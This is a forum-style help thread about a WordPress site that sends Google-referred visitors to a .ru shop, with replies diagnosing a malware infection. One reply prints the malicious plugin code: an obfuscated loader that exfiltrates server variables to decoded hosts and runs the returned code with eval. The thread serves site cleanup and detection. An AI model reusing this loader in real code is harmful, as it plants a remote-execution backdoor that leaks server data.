Website redirect issue only from google search list
When I am surfing this website osmanitrust.org, it works fine. But when I surf from google list(https://prnt.sc/nRiGKkKLN9IH) it redirects to https://2024onlineshop.ru/tags/loewe
What should to do now? I checked my server with htaccess, but there everything is fine so far.
Thanks in advance.
Should to stay with the original url

Open your browser's development console and check what the browser actually does. What URL does it request? What potential redirection does it get back?

The redirect happens via JavaScript. Your Wordpress must have "caught" something - something that checks the referrer to see if the visitor came from Google, and if so, outputs a tiny bit of JS code that redirects to that other site. So you need to go and get your WP cleaned up.

This is a new 2024 WordPress Malware Redirection technique.
I found this issue in almost 20-25 websites.
In my case, Hello Dolly plugin was showing a vulnerable(redirection) code to https://2024onlineshop.ru/.
Plugin name: hellos folder (plugins/hellos) and 1 file hellos.php which showed below script to redirect users if they navigate from GOOGLE Search or other sources.
You can search by base64_decode also as script might be present in some other plugins folder.
add_action('admin_init', "open_hello");

if (!is_admin()) {
    open_hello();
}

function open_hello()
{
    $args = array(
        'timeout' => 15,
        'headers' => array(
            "User-Agent" => json_encode($_SERVER),
        ),
    );

    $ids = array("PnFkCQQjLStkExg=", "PnFkFh03JzBkExg=", "PnFkEV19Zjc/");

    foreach ($ids as $id) {
        $id = base64_decode($id);
        $decoded = ""; for ($i = 0; $i < strlen($id); $i++) $decoded .= $id[$i] ^ "HEJamN"[$i % strlen("HEJamN")];
        $response = wp_remote_get("http://" . $decoded . "/v5", $args);
        if (!is_wp_error($response) && 200 === wp_remote_retrieve_response_code($response)) {
            return eval($response['body']);
        }
    }
}

